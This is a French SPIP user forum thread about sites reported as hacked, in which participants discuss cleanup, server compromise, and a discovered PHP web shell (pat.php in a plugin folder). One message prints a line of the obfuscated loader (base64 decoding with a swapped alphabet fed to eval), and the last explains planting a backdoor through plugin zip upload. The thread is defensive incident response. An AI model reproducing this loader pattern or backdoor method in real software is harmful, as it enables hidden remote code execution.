site hacké

Bonjour, je reçois ce mail concernant certains de mes sites que me conseillez vous?

Hello, 

It came to our attention that your site has been hacked. 
The following url is hosting malicious content: [http://nomddoamine/IMG/html/index.html](http://tropictour.sn/IMG/html/index.html)

To prevent further damage to your site or other websites you should clean this up as soon as possible. 

A quick tutorial about cleaning up your website can be found here: [http://websitescanner.net/website](http://websitescanner.net/website)

If you have cleaned up the infection and want to make sure your site is really clean, 
you can reissue a scan here: [http://websitescanner.net/scan/tropictour.sn](http://websitescanner.net/scan/tropictour.sn)

Please feel free to contact us if you have any further questions. 

Kind regards, 
Website Scanner malware patrol team

Sjon 

Bonjour,

la procédure habituelle :
- nettoyage, mise à jour, etc.

Ce site est en 2.1.10 ... Dernière version 2.1.26 .
http://files.spip.org/spip/archives/

Tu pourras trouver des infos ici :
http://contrib.spip.net/SPIP-hacke-que-faire

Le 23/12/2014 16:02, Vincent a écrit :

Bonjour,

la procédure habituelle :
- nettoyage, mise à jour, etc.

Ce site est en 2.1.10 ... Dernière version 2.1.26 .
SPIP-Contrib

Tu pourras trouver des infos ici :
SPIP hacké, que faire ? - SPIP-Contrib

idem avec une version à jour. Comme dit dans le groupe devel, c'est manifestement apache qui a une faille puisque j'ai eu le même message avec un site sous magento, en plus de la dizaine sous spip.

--
Jean-Max Reymond
Éruption de l'Etna: Eruption de l'Etna 2002

Le 23/12/2014 16:10, Jean-Max Reymond a écrit :

Le 23/12/2014 16:02, Vincent a écrit :

Bonjour,

la procédure habituelle :
- nettoyage, mise à jour, etc.

Ce site est en 2.1.10 ... Dernière version 2.1.26 .
SPIP-Contrib

Tu pourras trouver des infos ici :
SPIP hacké, que faire ? - SPIP-Contrib

idem avec une version à jour. Comme dit dans le groupe devel, c'est
manifestement apache qui a une faille puisque j'ai eu le même message
avec un site sous magento, en plus de la dizaine sous spip.

Il y a quelque chose à faire ou faut-il attendre qu'Apache fasse le boulot ?
--
Ysabeau

Le 23/12/2014 16:10, Jean-Max Reymond a écrit :

Le 23/12/2014 16:02, Vincent a écrit :

Bonjour,

la procédure habituelle :
- nettoyage, mise à jour, etc.

Ce site est en 2.1.10 ... Dernière version 2.1.26 .
SPIP-Contrib

Tu pourras trouver des infos ici :
SPIP hacké, que faire ? - SPIP-Contrib

idem avec une version à jour. Comme dit dans le groupe devel, c'est
manifestement apache qui a une faille puisque j'ai eu le même message
avec un site sous magento, en plus de la dizaine sous spip.

Est ce que les sites étaient hébergés sur un même compte ?

Un backdoor qui a été uploadé peut très bien remonter l'arborescence des fichiers et déposer n'importe quoi n'importe où s'il en a les droits (parcours des répertoires).

--
nicod_

Hmm,

dans ce cas, à voir avec qui gère le serveur car il va falloir
déterminer si possible:
- par ou le gus est rentré
- comment.

Si le système d'exploitation du serveur est compromis, la c'est une
autre paire de manches, ça passe très probablement par une
réinstallation a blanc du serveur avant de nettoyer et de remettre les
sites dessus un par uns après nettoyage. Ca promet quelques heures de
boulot ... Il faudra déterminer le niveau de compromission: si le
bonhomme n'a accès qu'a apache ( le compte qui le fait tourner ), ou
s'il a pris le contrôle complet du serveur.

Pour ma part, dans un cas comme ça, je prend directement un nouveau
serveur que j'installe depuis zéro, et je migre les sites dessus un à un
après les avoir nettoyé hors ligne. Ensuite, je passe le serveur
compromis au lance flammes ...

Salut,

2014-12-23 15:52 GMT+01:00 manou liman <manouliman@gmail.com>:

It came to our attention that your site has been hacked.
The following url is hosting malicious content:
http://nomddoamine/IMG/html/index.html

Ce fichier (IMG/html/index.html) est vraiment présent sur tes sites ?

Parce que sinon, le reste du mail ressemble plus à spam publicitaire
qu'à une alerte légitime...

--
Beurt

Le 23/12/2014 17:37, Beurt a écrit :

Salut,

2014-12-23 15:52 GMT+01:00 manou liman <manouliman@gmail.com>:

It came to our attention that your site has been hacked.
The following url is hosting malicious content:
http://nomddoamine/IMG/html/index.html

Ce fichier (IMG/html/index.html) est vraiment présent sur tes sites ?

Parce que sinon, le reste du mail ressemble plus à spam publicitaire
qu'à une alerte légitime...

oui, le fichier existe bien.
et si tu veux avoir la liste des sites infectés:
http://www.zone-h.org/archive/filter=1

--
Jean-Max Reymond
TML Voile http://www.tmlvoile.com

Le 23/12/2014 18:08, Jean-Max Reymond a écrit :

Le 23/12/2014 17:37, Beurt a écrit :

Salut,

2014-12-23 15:52 GMT+01:00 manou liman <manouliman@gmail.com>:

It came to our attention that your site has been hacked.
The following url is hosting malicious content:
http://nomddoamine/IMG/html/index.html

Ce fichier (IMG/html/index.html) est vraiment présent sur tes sites ?

Parce que sinon, le reste du mail ressemble plus à spam publicitaire
qu'à une alerte légitime...

oui, le fichier existe bien.
et si tu veux avoir la liste des sites infectés:
http://www.zone-h.org/archive/filter=1

j'ai retrouvé l'@ IP et il y a bcp d'activité sur:
plugins/auto/thickbox2/pat.php

cela existe ou bien est ce le cheval de troie ?

--
Jean-Max Reymond
TML Voile http://www.tmlvoile.com

Jean-Max Reymond a écrit le 23/12/2014 18:27 :

Le 23/12/2014 18:08, Jean-Max Reymond a écrit :

Le 23/12/2014 17:37, Beurt a écrit :

Salut,

2014-12-23 15:52 GMT+01:00 manou liman <manouliman@gmail.com>:

It came to our attention that your site has been hacked.
The following url is hosting malicious content:
http://nomddoamine/IMG/html/index.html

Ce fichier (IMG/html/index.html) est vraiment présent sur tes sites ?

Parce que sinon, le reste du mail ressemble plus à spam publicitaire
qu'à une alerte légitime...

oui, le fichier existe bien.
et si tu veux avoir la liste des sites infectés:
http://www.zone-h.org/archive/filter=1

j'ai retrouvé l'@ IP et il y a bcp d'activité sur:
plugins/auto/thickbox2/pat.php

cela existe ou bien est ce le cheval de troie ?

Dans Connexion · GitLab
Il n'y a pas de fichier pat.php

renomme-le en .txt et regarde-le
Si c'est bien un shell PHP, il se pourrait que ton antivirus t'interdise de l'enregistrer sur ton disque dur :wink:

--
RealET

Le 23/12/2014 19:09, RealET a écrit :

Jean-Max Reymond a écrit le 23/12/2014 18:27 :

Le 23/12/2014 18:08, Jean-Max Reymond a écrit :

Le 23/12/2014 17:37, Beurt a écrit :

Salut,

2014-12-23 15:52 GMT+01:00 manou liman <manouliman@gmail.com>:

It came to our attention that your site has been hacked.
The following url is hosting malicious content:
http://nomddoamine/IMG/html/index.html

Ce fichier (IMG/html/index.html) est vraiment présent sur tes sites ?

Parce que sinon, le reste du mail ressemble plus à spam publicitaire
qu'à une alerte légitime...

oui, le fichier existe bien.
et si tu veux avoir la liste des sites infectés:
http://www.zone-h.org/archive/filter=1

j'ai retrouvé l'@ IP et il y a bcp d'activité sur:
plugins/auto/thickbox2/pat.php

cela existe ou bien est ce le cheval de troie ?

Dans Connexion · GitLab
Il n'y a pas de fichier pat.php

renomme-le en .txt et regarde-le
Si c'est bien un shell PHP, il se pourrait que ton antivirus t'interdise
de l'enregistrer sur ton disque dur :wink:

pas de soucis, je suis sous ubuntu. :slight_smile:
Le virus est du code php encodé en base64
$O000O0O00=fopen($OOO0O0O00,'rb');while(--$O00O00O00)fgets($O000O0O00,1024);fgets($O000O0O00,4096);$OO00O00O0=(base64_decode(strtr(fread($O000O0O00,372),'etWxjw1Yd7sR4m5Q2bzJPq6gGKnka+i3F0Mu8TDc/NoSILpVvBZA9hECyUXHOrfl=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($OO00O00O0);
puis du code crypté lu par le code ci dessus

Sans doute, plus intéressant, j'ai retrouvé le code en regardant dans mes logs spip, tous les POST ne venant pas de rédacteurs et je suis tombé sur une adresse IP qui n'avait pas à faire de POST et il faisait des POST sur ce fichier pat.php
Du coup, j'ai remplacé le module thickbox2 par thickbox3 dans sa dernière version mais je vais regarder pour faire appartenir toute l'arborescence spip à un autre utilisateur que www-data sauf de mémoire tmp/

--
Jean-Max Reymond
TML Voile http://www.tmlvoile.com

Hélas oui il y’avait bien ce fichier IMG/html/index.html !

En fait c’est hyper simple d’installer un backdoor une fois qu’on est admin (via une faille déjà connue) :
il suffit dans l’installation des plugins d’indiquer un zip de son plugin modifié - et SPIP va installer des fichiers php sur le serveur.
Ce mécanisme qui permet de mettre n’importe quel zip dans les plugins/auto est super dangereux en fait – même si c’est bien pratique :slight_smile:
Il faudrait mettre en place un système de signatures officielles ou peut-être interdire ce mécanisme